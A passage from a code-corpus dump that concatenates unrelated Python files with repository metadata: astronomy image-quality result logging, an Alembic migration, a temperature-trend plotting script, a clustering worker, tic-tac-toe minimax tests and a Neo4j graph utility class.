{}'.format(new_result['filter']))\n except: self.logger.warning(' Could not write filter to result')\n\n try:\n new_result['WCS RA'] = self.coordinate_of_center_pixel.to_string(\\\n 'hmsdms', sep=':', precision=1).split()[0]\n new_result['WCS Dec'] = self.coordinate_of_center_pixel.to_string(\\\n 'hmsdms', sep=':', precision=0).split()[1]\n self.logger.debug(' Result: WCS RA = {}'.format(new_result['WCS RA']))\n self.logger.debug(' Result: WCS Dec = {}'.format(new_result['WCS Dec']))\n except: self.logger.warning(' Could not write WCS RA and Dec to result')\n\n try:\n wcs_header = self.image_WCS.to_header()\n new_result['CRPIX1'] = wcs_header['CRPIX1']\n new_result['CRPIX2'] = wcs_header['CRPIX2']\n new_result['CRVAL1'] = wcs_header['CRVAL1']\n new_result['CRVAL2'] = wcs_header['CRVAL2']\n new_result['PC1_1'] = wcs_header['PC1_1']\n new_result['PC2_2'] = wcs_header['PC2_2']\n self.logger.debug(' Result: WCS CRPIX1 = {}'.format(new_result['CRPIX1']))\n self.logger.debug(' Result: WCS CRPIX2 = {}'.format(new_result['CRPIX2']))\n self.logger.debug(' Result: WCS CRVAL1 = {}'.format(new_result['CRVAL1']))\n self.logger.debug(' Result: WCS CRVAL2 = {}'.format(new_result['CRVAL2']))\n self.logger.debug(' Result: WCS PC1_1 = {}'.format(new_result['PC1_1']))\n self.logger.debug(' Result: WCS PC2_2 = {}'.format(new_result['PC2_2']))\n if 'PC1_2' in wcs_header.keys():\n new_result['PC1_2'] = wcs_header['PC1_2']\n self.logger.debug(' Result: WCS PC1_2 = {}'.format(new_result['PC1_2']))\n if 'PC2_1' in wcs_header.keys():\n new_result['PC2_1'] = wcs_header['PC2_1']\n self.logger.debug(' Result: WCS PC2_1 = {}'.format(new_result['PC2_1']))\n except:\n self.logger.warning(' Could not write WCS values to result')\n if self.image_WCS:\n for entry in self.image_WCS.to_header():\n self.logger.debug('{} {}'.format(entry, self.image_WCS.to_header()[entry]))\n else:\n self.logger.debug('No WCS read from header')\n\n try:\n obsdt = datetime.datetime.strptime(str(self.observation_date), '%Y-%m-%dT%H:%M:%S')\n new_result['date'] = obsdt.strftime('%Y%m%dUT')\n new_result['time'] = obsdt.strftime('%H:%M:%S')\n new_result['exposure start'] = obsdt\n self.logger.debug(' Result: date = {}'.format(new_result['date']))\n self.logger.debug(' Result: time = {}'.format(new_result['time']))\n except: self.logger.warning(' Could not write date and time to result')\n\n try:\n new_result['FWHM pix median'] = float(self.FWHM_median.to(u.pix).value)\n self.logger.debug(' Result: FWHM pix median = {}'.format(new_result['FWHM pix median']))\n except: self.logger.warning(' Could not write FWHM pix median to result')\n\n try:\n new_result['FWHM pix mode'] = float(self.FWHM_mode.to(u.pix).value)\n self.logger.debug(' Result: FWHM pix mode = {}'.format(new_result['FWHM pix mode']))\n except: self.logger.warning(' Could not write FWHM pix mode to result')\n\n try:\n new_result['FWHM pix'] = float(self.FWHM.to(u.pix).value)\n self.logger.debug(' Result: FWHM pix = {}'.format(new_result['FWHM pix']))\n except: self.logger.warning(' Could not write FWHM pix to result')\n\n try:\n new_result['ellipticity median'] = float(self.ellipticity_median)\n self.logger.debug(' Result: ellipticity median = {}'.format(new_result['ellipticity median']))\n except: self.logger.warning(' Could not write ellipticity median to result')\n\n try:\n new_result['ellipticity mode'] = float(self.ellipticity_mode)\n self.logger.debug(' Result: ellipticity mode = {}'.format(new_result['ellipticity mode']))\n except: self.logger.warning(' Could not write ellipticity mode to result')\n\n try:\n new_result['ellipticity'] = float(self.ellipticity)\n self.logger.debug(' Result: ellipticity = {}'.format(new_result['ellipticity']))\n except: self.logger.warning(' Could not write ellipticity to result')\n\n try:\n new_result['n_stars'] = int(self.n_stars_SExtracted)\n self.logger.debug(' Result: n_stars = {}'.format(new_result['n_stars']))\n except: self.logger.warning(' Could not write n_stars to result')\n\n try:\n new_result['background'] = float(self.SExtractor_background)\n self.logger.debug(' Result: background = {}'.format(new_result['background']))\n except: self.logger.warning(' Could not write background to result')\n\n try:\n new_result['background RMS'] = float(self.SExtractor_background_RMS)\n self.logger.debug(' Result: background RMS = {}'.format(new_result['background RMS']))\n except: self.logger.warning(' Could not write background RMS to result')\n\n try:\n new_result['pointing error arcmin'] = float(self.pointing_error.arcminute)\n self.logger.debug(' Result: pointing error arcmin = {}'.format(new_result['pointing error arcmin']))\n except: self.logger.warning(' Could not write pointing error arcmin to result')\n\n if self.zero_point:\n try:\n new_result['zero point'] = float(self.zero_point.value)\n self.logger.debug(' Result: zero point = {}'.format(new_result['zero point']))\n except: self.logger.warning(' Could not write zero point to result')\n\n try:\n new_result['alt'] = float(self.target_alt.to(u.deg).value)\n self.logger.debug(' Result: alt = {}'.format(new_result['alt']))\n except: self.logger.warning(' Could not write alt to result')\n\n try:\n new_result['az'] = float(self.target_az.to(u.deg).value)\n self.logger.debug(' Result: az = {}'.format(new_result['az']))\n except: self.logger.warning(' Could not write az to result')\n\n try:\n new_result['airmass'] = float(self.airmass)\n self.logger.debug(' Result: airmass = {}'.format(new_result['airmass']))\n except: self.logger.warning(' Could not write airmass to result')\n\n try:\n new_result['moon separation'] = float(self.moon_sep.to(u.deg).value)\n self.logger.debug(' Result: moon separation = {}'.format(new_result['moon separation']))\n except: self.logger.warning(' Could not write moon separation to result')\n\n try:\n new_result['moon illumination'] = float(self.moon_phase)\n self.logger.debug(' Result: moon illumination = {}'.format(new_result['moon illumination']))\n except: self.logger.warning(' Could not write moon illumination to result')\n\n try:\n new_result['moon alt'] = float(self.moon_alt.value)\n self.logger.debug(' Result: moon alt = {}'.format(new_result['moon alt']))\n except: self.logger.warning(' Could not write moon alt to result')\n\n if self.position_angle:\n try:\n new_result['WCS position angle'] = float(self.position_angle.to(u.deg).value)\n self.logger.debug(' Result: WCS_position_angle = {}'.format(new_result['WCS position angle']))\n except: self.logger.warning(' Could not write WCS position angle to result')\n\n try:\n new_result['flags'] = self.flags\n self.logger.debug(' Result: flags = {}'.format(new_result['flags']))\n except: self.logger.warning(' Could not write flags to result')\n\n try:\n new_result['IQMon Version'] = str(__version__)\n self.logger.debug(' Result: IQMon Version = {}'.format(new_result['IQMon Version']))\n except: self.logger.warning(' Could not write IQMon Version to result')\n\n try:\n new_result['IQMon processing time'] = float(self.total_process_time)\n self.logger.debug(' Result: IQMon processing time = {}'.format(new_result['IQMon processing time']))\n except: self.logger.warning(' Could not write IQMon processing time to result')\n\n try:\n new_result['IQMon start time'] = self.start_process_time + datetime.timedelta(0, 60*60*10)\n self.logger.debug(' Result: IQMon Start Time = {}'.format(\\\n new_result['IQMon start time'].strftime('%Y%m%d %H:%M:%S')))\n except: self.logger.warning(' Could not write IQMon start time to result')\n\n new_result['jpegs'] = self.jpeg_file_names\n self.logger.debug(' Result: IQMon JPEGs = {}'.format(new_result['jpegs']))\n\n if self.PSF_plot_file:\n new_result['PSF plot'] = os.path.split(self.PSF_plot_file)[1]\n else:\n new_result['PSF plot'] = ''\n self.logger.debug(' Result: IQMon PSF Plot = {}'.format(new_result['PSF plot']))\n\n if self.zero_point_plotfile:\n new_result['ZP plot'] = os.path.split(self.zero_point_plotfile)[1]\n else:\n new_result['ZP plot'] = ''\n self.logger.debug(' Result: IQMon ZP Plot = {}'.format(new_result['ZP plot']))\n\n ## Check if this image is already in the collection\n matches = [item for item in data.find( {\"filename\" : new_result['filename']} )]\n\n ## Add datum to collection\n try:\n id = data.insert(new_result)\n self.logger.debug(' Inserted document with ID: {}'.format(id))\n self.logger.debug(' Found {} previous entries. Deleting old entries.'.format(\\\n len(matches)))\n for match in matches:\n data.remove( {\"_id\" : match[\"_id\"]} )\n self.logger.debug(' Removed \"_id\": {}'.format(match[\"_id\"]))\n except:\n self.logger.warning(' Failed to insert document')\n return False\n\n return True\n\n\n\n ##-------------------------------------------------------------------------\n ## Append Line With Image Info to YAML Text File\n ##-------------------------------------------------------------------------\n def add_yaml_entry(self, summary_file):\n self.logger.info(\"Writing YAML Summary File: {}\".format(summary_file))\n result_list = []\n if os.path.exists(summary_file):\n self.logger.debug(' Reading existing summary file.')\n with open(summary_file, 'r') as yaml_string:\n result_list = yaml.load(yaml_string)\n ## Form dictionary with new result info\n try:\n FWHM_median_pix = self.FWHM_median.to(u.pix).value\n except:\n FWHM_median_pix = None\n try:\n FWHM_mode_pix = self.FWHM_mode.to(u.pix).value\n except:\n FWHM_mode_pix = None\n try:\n FWHM_pix = self.FWHM.to(u.pix).value\n except:\n FWHM_pix = None\n try:\n pointing_error_arcmin = self.pointing_error.arcminute\n except:\n pointing_error_arcmin = None\n try:\n alt = self.target_alt.to(u.deg).value\n except:\n alt = None\n try:\n az = self.target_az.to(u.deg).value\n except:\n az = None\n try:\n moon_sep = self.moon_sep.to(u.deg).value\n except:\n moon_sep = None\n try:\n posang = self.position_angle.to(u.deg).value\n except:\n posang = None\n new_result = {\n 'filename': self.raw_file_name,\\\n 'exposure_start': self.observation_date,\\\n 'FWHM_median_pix': str(FWHM_median_pix),\\\n 'FWHM_mode_pix': str(FWHM_mode_pix),\\\n 'FWHM_pix': str(FWHM_pix),\\\n 'ellipticity_median': str(self.ellipticity_median),\\\n 'ellipticity_mode': str(self.ellipticity_mode),\\\n 'ellipticity': str(self.ellipticity),\\\n 'n_stars': str(self.n_stars_SExtracted),\\\n 'background': str(self.SExtractor_background),\\\n 'background_rms': str(self.SExtractor_background_RMS),\\\n 'pointing_error_arcmin': str(pointing_error_arcmin),\\\n 'zero_point': str(self.zero_point.value),\\\n 'alt': str(alt),\\\n 'az': str(az),\\\n 'airmass': str(self.airmass),\\\n 'moon_separation': str(moon_sep),\\\n 'moon_illumination': str(self.moon_phase),\\\n 'WCS_position_angle': str(posang),\\\n 'process_time': str(self.total_process_time),\\\n 'flags': str(self.flags),\\\n 'IQMon Version': str(__version__),\\\n }\n result_list.append(new_result)\n yaml_string = yaml.dump(result_list)\n with open(summary_file, 'w') as output:\n output.write(yaml_string)\n\n\n ##-------------------------------------------------------------------------\n ## Append Line With Image Info to Summary Text File\n ##-------------------------------------------------------------------------\n def add_summary_entry(self, summaryFile):\n self.logger.info(\"Writing Summary File Entry.\")\n self.logger.debug(\" Summary File: {0}\".format(summaryFile))\n ## Read in previous data\n if not os.path.exists(summaryFile):\n self.logger.debug(\" Making new astropy table object\")\n SummaryTable = table.Table(names=(\"ExpStart\", \"File\", \"FWHM (pix)\", \"Ellipticity\",\\\n \"Alt (deg)\", \"Az (deg)\", \"Airmass\", \"pointing_error (arcmin)\", \\\n \"ZeroPoint\", \"nStars\", \"Background\", \"Background RMS\"),\\\n dtype=('S22', 'S100', 'f4', 'f4', 'f4', 'f4',\\\n 'f4', 'f4', 'f4', 'i4', 'f4', 'f4'),\\\n masked=True)\n else:\n self.logger.debug(\" Reading astropy table object from file: {0}\".format(\\\n summaryFile))\n try:\n SummaryTable = ascii.read(summaryFile, guess=False,\n header_start=0, data_start=1,\n Reader=ascii.basic.Basic,\n delimiter=\"\\s\",\n fill_values=('--', '0'),\n converters={\n 'ExpStart': [ascii.convert_numpy('S22')],\n 'File': [ascii.convert_numpy('S100')],\n 'FWHM (pix)': [ascii.convert_numpy('f4')],\n 'Ellipticity': [ascii.convert_numpy('f4')],\n 'Alt (deg)': [ascii.convert_numpy('f4')],\n 'Az (deg)': [ascii.convert_numpy('f4')],\n 'Airmass': [ascii.convert_numpy('f4')],\n 'pointing_error (arcmin)': [ascii.convert_numpy('f4')],\n 'ZeroPoint': [ascii.convert_numpy('f4')],\n 'nStars': [ascii.convert_numpy('i4')],\n 'Background': [ascii.convert_numpy('f4')],\n 'Background RMS': [ascii.convert_numpy('f4')]\n })\n except:\n self.logger.critical(\"Failed to read summary file: {0} {1} {2}\".format(\\\n sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2]))\n ## Astropy table writer can not write None to table initialized\n ## with type. If any outputs are None, change to some value.\n tableMask = np.zeros(12)\n ## observation_date\n if self.observation_date: observation_date = self.observation_date\n else: \n observation_date = \"\"\n tableMask[0] = True\n ## FileName\n if self.raw_file_name: raw_file_name = self.raw_file_name\n else: \n raw_file_name = \"\"\n tableMask[1] = True\n ## FWHM\n if self.FWHM: FWHM = self.FWHM.to(u.pix).value\n else:\n FWHM = 0.\n tableMask[2] = True\n ## Ellipticity\n if self.ellipticity: ellipticity = self.ellipticity\n else:\n ellipticity = 0.\n tableMask[3] = True\n ## Target Alt\n if self.target_alt: target_alt = self.target_alt.to(u.deg).value\n else:\n target_alt = 0.\n tableMask[4] = True\n ## Target Az\n if self.target_az: target_az = self.target_az.to(u.deg).value\n else:\n target_az = 0.\n tableMask[5] = True\n ## Airmass\n if self.airmass: airmass = self.airmass\n else:\n airmass = 0.\n tableMask[6] = True\n ## Pointing Error\n if self.pointing_error: pointing_error = self.pointing_error.arcminute\n else:\n pointing_error = 0.\n tableMask[7] = True\n ## Zero Point\n if self.zero_point: zeroPoint = self.zero_point.value\n else:\n zeroPoint = 0.\n tableMask[8] = True\n ## n_stars_SExtracted\n if self.n_stars_SExtracted: n_stars_SExtracted = self.n_stars_SExtracted\n else: \n n_stars_SExtracted = 0.\n tableMask[9] = True\n ## SExtractor Background\n if self.SExtractor_background: SExtractor_background = self.SExtractor_background\n else:\n SExtractor_background = 0.\n tableMask[10] = True\n ## SExtractor Background RMS\n if self.SExtractor_background_RMS: SExtractor_background_RMS = self.SExtractor_background_RMS\n else:\n SExtractor_background_RMS = 0.\n tableMask[11] = True\n ## Add row to table\n self.logger.debug(\" Writing new row to log table. Filename: {0}\".format(raw_file_name))\n SummaryTable.add_row((observation_date, raw_file_name,\n FWHM, ellipticity,\n target_alt, target_az,\n airmass, pointing_error,\n zeroPoint, n_stars_SExtracted,\n SExtractor_background, SExtractor_background_RMS),\n mask=tableMask)\n ## Write Table to File\n self.logger.debug(\" Writing new summary file.\")\n ascii.write(SummaryTable, summaryFile,\n Writer=ascii.basic.Basic)\n\n\n ##-------------------------------------------------------------------------\n ## Calcualte Process Time\n ##-------------------------------------------------------------------------\n def calculate_process_time(self):\n '''\n Determine how long it took for IQMon to process this image. Determined\n by subtracting the starting time (determined on the initialization of \n the image object) to the ending time (determined by this method).\n '''\n self.end_process_time = datetime.datetime.now()\n self.total_process_time = (self.end_process_time - self.start_process_time).total_seconds()\n self.logger.info(\"IQMon processing time = {0:.1f} seconds\".format(self.total_process_time))\n\n","repo_name":"mwcraig/IQMon","sub_path":"IQMon.py","file_name":"IQMon.py","file_ext":"py","file_size_in_byte":157507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"10070645783","text":"\"\"\"Removed runtime_type table\n\nRevision ID: e60f8742b969\nRevises: 84e857000376\nCreate Date: 2022-12-12 12:25:38.278913\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = 'e60f8742b969'\ndown_revision = '84e857000376'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_index('ix_runtime_type_scale_type', table_name='runtime_type')\n op.drop_index('ix_runtime_type_spec_name', table_name='runtime_type')\n op.drop_index('ix_runtime_type_spec_version', table_name='runtime_type')\n op.drop_table('runtime_type')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('runtime_type',\n sa.Column('spec_name', mysql.VARCHAR(length=255), nullable=False),\n sa.Column('spec_version', mysql.INTEGER(), autoincrement=False, nullable=False),\n sa.Column('scale_type', mysql.VARCHAR(length=512), nullable=False),\n sa.Column('decoder_class', mysql.VARCHAR(length=255), nullable=True),\n sa.Column('is_core_primitive', mysql.TINYINT(display_width=1), autoincrement=False, nullable=True),\n sa.Column('is_runtime_primitive', mysql.TINYINT(display_width=1), autoincrement=False, nullable=True),\n sa.PrimaryKeyConstraint('spec_name', 'spec_version', 'scale_type'),\n mysql_collate='utf8mb4_0900_ai_ci',\n mysql_default_charset='utf8mb4',\n mysql_engine='InnoDB'\n )\n op.create_index('ix_runtime_type_spec_version', 'runtime_type', ['spec_version'], unique=False)\n op.create_index('ix_runtime_type_spec_name', 'runtime_type', ['spec_name'], unique=False)\n op.create_index('ix_runtime_type_scale_type', 'runtime_type', ['scale_type'], unique=False)\n # ### end Alembic commands ###\n","repo_name":"polkascan/harvester","sub_path":"db/versions/e60f8742b969_removed_runtime_type_table.py","file_name":"e60f8742b969_removed_runtime_type_table.py","file_ext":"py","file_size_in_byte":1865,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"53"} +{"seq_id":"14285187144","text":"import os, numpy as np\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nhomedir = os.getenv('HOME')\n\ndatapath = os.path.join(homedir, 'Dokumente','python-apps','tensorflow', 'eu_air_pollution_data')\ndatafile = 'Schleswig_Klima_Tag_hist.txt'\n\nindatapath = os.path.join(datapath,datafile)\n\ndf = pd.read_csv(indatapath, header=0, sep=';',usecols=[1,13], names=['Datum', 'daytempmean'])\ndf['dt'] = pd.to_datetime(df.Datum, format='%Y%m%d')\ndf.drop(columns='Datum', inplace=True)\ndf['year'] = df['dt'].dt.year\ndf.sort_values(by=['dt'], ascending=[True], inplace=True, axis=0)\n# Deal with missings:\nmis = df.loc[(df.daytempmean == -999)]\n#print(len(mis)) No missings in the data\ndf2 = pd.DataFrame()\ndf2['av_temp_year'] = df.groupby(['year'], sort=False, as_index=True).daytempmean.mean()\nprint(df2)\n\n\nfig, ax = plt.subplots(figsize=[10,7.5])\nax.scatter(df2.index, df2.av_temp_year, color='b')\n\nax.set_xlim(1947, 2018)\nax.tick_params(labelsize=18)\n\nax.set_title('Mean annual temperature (°celsius) in city Schleswig', fontsize='xx-large')\nax.legend(loc=3, prop={'size': 18})\nax.grid(True)\n\nplt.xlabel('1947 - 2018', fontsize='xx-large')\nplt.ylabel('Temp. [°Celsius]', fontsize='xx-large')\nfig.autofmt_xdate(rotation=30)\nplt.savefig('Schleswig_temperature_historical.png', dpi=None, facecolor='w', edgecolor='w',\n orientation='landscape', format='png')\n\n\n\n# do linear regression:\nimport statsmodels.api as sm\nx = np.arange(1, len(df2.index)+1)\ny = df2.av_temp_year # response\nX = x # predictor\nX = sm.add_constant(X) # Adds a constant term to the predictor\nmodel = sm.OLS(y, X).fit()\ndf2['predicted'] = model.predict(X)\n\nfig, ax = plt.subplots(figsize=[10,7.5])\nax.plot(df2.index, df2['predicted'], label='Trend (linear regression)', color='red')\nax.scatter(df2.index, df2.av_temp_year, color='grey')\n\nax.set_xlim(1947, 2018)\nax.tick_params(labelsize=18)\n\nax.set_title('Mean annual temperature in city Schleswig', fontsize='xx-large')\nax.legend(loc=3, prop={'size': 18})\nax.grid(True)\n\nplt.xlabel('1947 - 2018', fontsize='xx-large')\nplt.ylabel('Temperature (°Celsius)', fontsize='xx-large')\nfig.autofmt_xdate(rotation=30)\nplt.savefig('Schleswig_temperature_historical2.png', dpi=None, facecolor='w', edgecolor='w',\n orientation='landscape', format='png')\n\n\n","repo_name":"DirkEngfer/PandasTests","sub_path":"Schleswig_temperature_hist.py","file_name":"Schleswig_temperature_hist.py","file_ext":"py","file_size_in_byte":2276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24601826788","text":"import os\nimport os.path\nimport scorer\nimport backenddb as bdb\n\nclass Worker:\n def __init__(self, app):\n self.db = bdb.BackendDB()\n self.OUTPUT_FOLDER = app.config['OUTPUT_FOLDER']\n self.UPLOAD_FOLDER = app.config['UPLOAD_FOLDER']\n \n def score(self, token):\n self.db.set_state(token, bdb.States.SCORE_WORK)\n self.db.add_message(token, 'Received file')\n expr_file = self.db.get_files(token)['EXPRESSION']\n outfile = os.path.join(self.OUTPUT_FOLDER, \"%s.KMTEXT.csv\" % (token, ) ) \n status,res = self.do_score(token, expr_file, outfile)\n if (status):\n self.db.add_file(token, outfile, bdb.Filetypes.CLUSTERS)\n self.db.set_state(token, bdb.States.SCORED)\n self.db.add_message(token, 'Work finished')\n else:\n self.db.set_state(token, bdb.States.FILE_FAILED)\n self.db.add_message(token, res)\n \n def score_surv(self, token):\n self.db.set_state(token, bdb.States.SURV_WORK)\n self.db.add_message(token, \"Received survival data\")\n files = self.db.get_files(token)\n survfile = files['SURVIVAL']\n clusterfile = files['CLUSTERS']\n status,res,res2 = self.do_surv(token, survfile,clusterfile)\n if(status):\n self.db.add_file(token, res, bdb.Filetypes.KMPLOT)\n self.db.add_file(token, res2, bdb.Filetypes.KMTEXT)\n self.db.set_state(token, bdb.States.SURVDONE)\n self.db.add_message(token, \"KM plot done\")\n else:\n self.db.set_state(token, bdb.States.SURV_FAILED)\n self.db.add_message(token, res)\n\n def do_score(self, token, datafile, outfile):\n sc = scorer.Scorer()\n ok, error = sc.load_data(datafile, True)\n if ok:\n self.db.add_message(token, error)\n else:\n self.db.add_message(token, res)\n return (False,error)\n sc.score()\n outfile = sc.save(outfile)\n return (True, \"\")\n \n def do_surv(self, token, survfile, clusterfile):\n kmplotfile = os.path.join(self.OUTPUT_FOLDER, token+\".KMPLOT.png\")\n kmtextfile = os.path.join(self.OUTPUT_FOLDER, token+\".KMTEXT.csv\")\n sc = scorer.Scorer()\n ok, error = sc.load_surv(survfile, clusterfile)\n if (not ok):\n return (False, error, \"\") \n sc.score_surv(kmplotfile, kmtextfile)\n return(True, kmplotfile, kmtextfile)\n","repo_name":"dnebdal/clusterscore","sub_path":"worker/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"45028139925","text":"from unittest import TestCase\nfrom src.tictactoe.t3_board import T3Board\nfrom src.tictactoe.t3_tree import T3Tree, Node\nfrom .test_constants import (\n VALID_BOARD,\n COMMON_BOARD_OPENING,\n X_ALMOST_WINS,\n O_ALMOST_WINS,\n VALID_O_WINS,\n EMPTY_BOARD,\n)\n\n\nclass TestT3Tree(TestCase):\n def setUp(self):\n self.board = T3Board(VALID_BOARD)\n self.tree = T3Tree(self.board)\n\n def test_init(self):\n self.assertIsInstance(self.tree.root, Node)\n self.assertEqual(self.tree.root.board, self.board)\n\n def test_tree_properties_after_construction(self):\n # Given\n initial_state = T3Board(COMMON_BOARD_OPENING)\n tree = T3Tree(initial_state)\n\n # When\n root_state = tree.root.board.state\n root_child_count = len(tree.root.childs)\n\n # Then\n self.assertEqual(\n root_state,\n initial_state.state,\n \"Root state of the tree should match the initial state\",\n )\n self.assertEqual(\n root_child_count, 8, \"Root should have 8 children (for 8 possible moves)\"\n )\n for child_node in tree.root.childs:\n self.assertEqual(\n len(child_node.board.state),\n 9,\n \"Each child node should have a board state of length 9\",\n )\n if not child_node.board.get_winner():\n self.assertGreater(\n len(child_node.childs),\n 0,\n \"Non-terminal child nodes should have children\",\n )\n else:\n self.assertEqual(\n len(child_node.childs),\n 0,\n \"Terminal child nodes should not have children\",\n )\n\n def test_given_x_almost_win_when_minimax_then_return_1(self):\n initial_state = T3Board(X_ALMOST_WINS)\n tree = T3Tree(initial_state)\n\n score = tree.minimax(tree.root, True, \"X\")\n\n self.assertEqual(score, 1)\n\n def test_given_board_when_minimax_then_return_0(self):\n initial_state = T3Board(VALID_BOARD)\n tree = T3Tree(initial_state)\n\n score = tree.minimax(tree.root, True, \"O\")\n\n self.assertEqual(score, 0)\n\n def test_given_valid_o_win_when_minimax_then_return_minus_1(self):\n initial_state = T3Board(VALID_O_WINS)\n tree = T3Tree(initial_state)\n\n score = tree.minimax(tree.root, True, \"X\")\n\n self.assertEqual(score, -1)\n\n def test_given_empty_board_when_minimax_then_return_valid_score(self):\n initial_state = T3Board(EMPTY_BOARD)\n tree = T3Tree(initial_state)\n\n score = tree.minimax(tree.root, True, \"X\")\n\n self.assertTrue(-1 <= score <= 1)\n\n def test_given_known_board_when_get_scores_then_return_expected_scores(self):\n initial_state = T3Board(O_ALMOST_WINS)\n tree = T3Tree(initial_state)\n\n scores = tree.get_scores()\n\n expected_scores = [1, 0, -1, -1]\n actual_scores = [score for score, _ in scores]\n self.assertEqual(actual_scores, expected_scores)\n\n def test_given_known_scores_when_get_best_moves_then_return_expected_moves(self):\n pass # TODO: implement this test\n\n def test_get_stats_from_childs(self):\n # Here you can test get_stats_from_childs method\n pass\n\n def test_count_leafs(self):\n # Here you can test count_leafs method\n pass\n\n\nif __name__ == \"__main__\":\n pass\n","repo_name":"Nootonium/AIPlaymaker","sub_path":"tests/tictactoe/test_t3_tree.py","file_name":"test_t3_tree.py","file_ext":"py","file_size_in_byte":3475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33818371926","text":"import datetime\nimport time\n\nfrom py2neo import Graph, Relationship, Node\nimport os\nimport uuid\nimport networkx as nx\nfrom shutil import move\n\n\nclass Neo4jUtils:\n def __init__(self):\n\n self.host = os.getenv(\"neo4j_host\", \"localhost\")\n # temple edit\n # self.port = int(os.getenv(\"neo4j_port\", \"7688\"))\n self.port = int(os.getenv(\"neo4j_port\", \"7687\"))\n self.user = os.getenv(\"neo4j_user\", \"neo4j\")\n self.password = os.getenv(\"neo4j_password\", \"magi\")\n counter = 0\n while True:\n try:\n if counter % 10000 == 0:\n print(f\"Trying to connect neo4j at host: {self.host}, port: {self.port}\")\n self.graph = Graph(host=self.host, port=self.port, user=self.user, password=self.password)\n print(\"Connected!\")\n self.graph.run(\"CREATE INDEX magi_index IF NOT EXISTS FOR (n:magi) ON (n.magi_display_name)\")\n break\n except:\n if counter % 10000 == 0:\n print(\"Connection failed. Trying again\")\n counter += 1\n time.sleep(5)\n continue\n try:\n self.graph.schema.create_index(\"magi\", \"level\")\n except:\n pass\n\n def __commit_transaction(self, entity):\n transaction = self.graph.begin()\n transaction.create(entity)\n transaction.commit()\n\n def __create_relationship(self, start_node: Node, end_node: Node, relation_name: str, relation_properties: dict):\n relationship = Relationship(start_node, relation_name, end_node)\n relation_properties['magi_insert_date'] = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n for key, value in relation_properties.items():\n relationship[key] = value\n self.__commit_transaction(relationship)\n return relationship\n\n def create_node(self, name: str, level: str, properties: dict):\n if not level:\n raise ValueError(\"Level must be provided.\")\n if level.upper().startswith(\"L2\"):\n existing_node = self.graph.nodes.match(name, level=level).first()\n if existing_node is not None:\n return existing_node\n properties['level'] = level.upper()\n properties['magi_display_name'] = name\n properties['magi_insert_date'] = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n node = Node(\"magi\", name, **properties)\n self.__commit_transaction(node)\n return node\n\n def get_node_by_id(self, node_id: int):\n return self.graph.nodes.get(node_id)\n\n def find_node_id(self, name: str, level: str):\n match = self.graph.nodes.match(name, level=level).first()\n return match.identity if match is not None else None\n\n def add_antisymmetric_relation(self, start_node: Node, end_node: Node, relation_name: str,\n relation_properties: dict):\n start_node_level = start_node[\"level\"]\n end_node_level = end_node[\"level\"]\n if start_node_level != end_node_level:\n raise ValueError(\"Cannot add antisymmetric relation between two nodes with different levels.\")\n relation = self.__create_relationship(start_node, end_node, relation_name, relation_properties)\n return relation\n\n def add_intension(self, start_node: Node, end_node: Node, relation_properties: dict):\n start_node_levels = start_node[\"level\"].split(\".\")\n end_node_levels = end_node[\"level\"].split(\".\")\n\n if int(start_node_levels[0][1:]) > int(end_node_levels[0][1:]):\n raise ValueError(\"Level of start node cannot be greater than the level of end node.\")\n\n if len(start_node_levels) == 2 and len(end_node_levels) == 2:\n if int(start_node_levels[1]) >= int(end_node_levels[1]):\n raise ValueError(\"Level of start node cannot be greater than or equal to the level of end node.\")\n\n intension = self.__create_relationship(start_node, end_node, \"intension\", relation_properties)\n return intension\n\n def add_extension(self, start_node: Node, end_node: Node, relation_properties: dict):\n start_node_levels = start_node[\"level\"].split(\".\")\n end_node_levels = end_node[\"level\"].split(\".\")\n\n if int(start_node_levels[0][1:]) < int(end_node_levels[0][1:]):\n raise ValueError(\"Level of start node cannot be less than the level of end node.\")\n\n if len(start_node_levels) == 2 and len(end_node_levels) == 2:\n if int(start_node_levels[1]) <= int(end_node_levels[1]):\n raise ValueError(\"Level of start node cannot be less than or equal to the level of end node.\")\n\n extension = self.__create_relationship(start_node, end_node, \"extension\", relation_properties)\n return extension\n\n def add_symmetric_relation(self, start_node: Node, end_node: Node, relation_name: str, relation_properties: dict):\n if start_node[\"level\"] != end_node[\"level\"]:\n raise ValueError(\"Cannot add symmetric relation between two nodes with different levels.\")\n relation1 = self.__create_relationship(start_node, end_node, relation_name, relation_properties)\n relation2 = self.__create_relationship(end_node, start_node, relation_name, relation_properties)\n return relation1, relation2\n\n def follows_temporally(self, start_node: Node, end_node: Node, how_many: int, how_long: str,\n contribution_amount: float):\n if start_node[\"level\"] != end_node[\"level\"]:\n raise ValueError(\"Cannot add symmetric relation between two nodes with different levels.\")\n # create the relation bw start_node and end_node if it does not exist\n # if exists, concat how_many and how_long to the attributes as a string\n relations = self.graph.match([start_node, end_node], r_type='followsTemporally').all()\n if len(relations) == 0:\n new_relation = self.__create_relationship(start_node, end_node, \"followsTemporally\",\n relation_properties={\"how_many\": how_many,\n \"how_long\": how_long,\n \"contribution_amount\": contribution_amount})\n return new_relation\n else:\n relations[0][\"how_many\"] += how_many\n if how_long and len(how_long) > 0:\n relations[0][\"how_long\"] = relations[0][\"how_long\"] + \",\" + how_long\n self.graph.push(relations[0])\n return relations[0]\n\n def export_db_to_graphml(self):\n file_name = str(uuid.uuid4())\n self.graph.run(\n f\"CALL apoc.export.graphml.all('/data/{file_name}.graphml', {{useTypes:true, storeNodeIds:false}})\").data()\n file_path = 